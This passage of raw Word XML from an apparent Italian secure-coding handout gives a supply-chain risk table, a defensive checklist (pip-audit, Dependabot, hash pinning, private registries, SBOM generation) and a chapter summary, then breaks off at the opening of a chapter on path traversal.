              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Violazione CRA dal 2027</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cyclonedx-py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">integrato nella pipeline di release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dipendenze installate da fonti non verificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Typosquatting, dependency confusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Solo PyPI ufficiale,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--require-hashes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">in produzione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pacchetti privati su registro pubblico configurato come fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dependency confusion attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Registro privato esclusivo, scope npm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nessun audit sulle dipendenze indirette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVE in</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">werkzeug</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">invisibili perché importi</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip-audit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">analizza l’intero ambiente, non solo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aggiornamento di un pacchetto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">senza leggere il changelog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Funzionalità interrotte, comportamenti cambiati</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Politica di team: cambiamenti major sempre con review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="410"/>
    <w:bookmarkStart w:id="411" w:name="checklist-operativa-supply-chain"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="562" w:name="sec_9_10"/>
      <w:r>
        <w:t xml:space="preserve">9.10 Checklist operativa Supply Chain</w:t>
      </w:r>
      <w:bookmarkEnd w:id="562"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">con versioni pinnate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) per build riproducibili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lanciato a ogni commit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CI/CD)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit --strict</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come gate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del merge</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependabot attivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sul repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aggiornamenti settimanali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">programmati delle dipendenze (anche fuori dalle PR di Dependabot)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aggiornamenti di sicurezza applicati entro 24-48 ore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dalla pubblicazione del CVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Verifica del nome del pacchetto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prima di ogni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">--require-hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">in produzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per fissare gli hash esatti</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Registri privati esclusivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per pacchetti aziendali (no fallback su PyPI)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM generata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automaticamente a ogni rilascio (CycloneDX o SPDX)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Strumento di SBOM monitoring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Dependency-Track, GitHub Advisory) attivo sulle release</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Code review sui cambi di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nessun pacchetto nuovo aggiunto senza approvazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Auditing periodico delle pipeline CI/CD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: chi può modificarle? Hanno accesso ai segreti?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="411"/>
    <w:bookmarkStart w:id="412" w:name="riepilogo-del-capitolo-8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="563" w:name="sec_9_11"/>
      <w:r>
        <w:t xml:space="preserve">9.11 Riepilogo del capitolo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="563"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">80-90% del codice di un’applicazione moderna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non è scritto dal team. Sono dipendenze open source. Tutti i loro bug sono i tuoi bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A03:2025</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Software Supply Chain Failures) è il #3 della classifica, salito drasticamente dal #6 della 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sei vettori di attacco principali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: CVE nelle dipendenze (più frequente), compromissione del codice sorgente di una libreria, typosquatting, dependency confusion, compromissione della pipeline CI/CD, account compromesso del manutentore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è lo strumento Python standard. Confronta le dipendenze con i database CVE e segnala vulnerabilità + versioni patchate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Casi reali studiati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Equifax/Apache Struts (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), Log4Shell (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), XZ Utils 2024 (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.4), SolarWinds 2020, event-stream npm 2018.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependabot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">automatizza la sorveglianza: PR automatiche per aggiornare le dipendenze quando esce un CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pipeline CI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit --strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come gate previene l’introduzione di nuove vulnerabilità.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SBOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Software Bill of Materials, formato CycloneDX o SPDX) sarà obbligatoria dal 2027 per il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Resilience Act</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Si genera con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cyclonedx-py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Typosquatting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: pacchetti malevoli con nomi simili a quelli popolari. Difesa: copia/incolla i nomi, verifica download e date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependency confusion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: difesa è registro privato esclusivo, non come fallback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hai eseguito</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su un progetto con dipendenze deliberatamente vecchie, hai visto i CVE, hai aggiornato e verificato l’azzeramento delle vulnerabilità, hai generato la tua prima SBOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Prossimo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal e cenni alle vulnerabilità del secondo anno.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ultimo capitolo della dispensa: vediamo Path Traversal in dettaglio, e poi un sommario rapido di CSRF, JWT, SSRF, Insecure Deserialization — cose che incontrerai in stage e in seconda annualità.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="412"/>
    <w:bookmarkEnd w:id="413"/>
    <w:bookmarkStart w:id="437" w:name="X4428ebdce90bd4778d036e7d34c484a22fa7865"/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="564" w:name="ch_10"/>
      <w:r>
        <w:t xml:space="preserve">Capitolo 10 — Path Traversal e ponte verso il secondo anno</w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima di leggere questo capitolo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Capitoli 3 (richieste HTTP), 5 (parametrizzazione), 6 (controllo accessi). Un minimo di filesystem (cartelle, file, percorsi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Quanto ci vorrà:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">90 minuti. Capitolo conclusivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questo è l’ultimo capitolo della dispensa. La prima metà tratta in dettaglio una vulnerabilità specifica e diffusa: il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
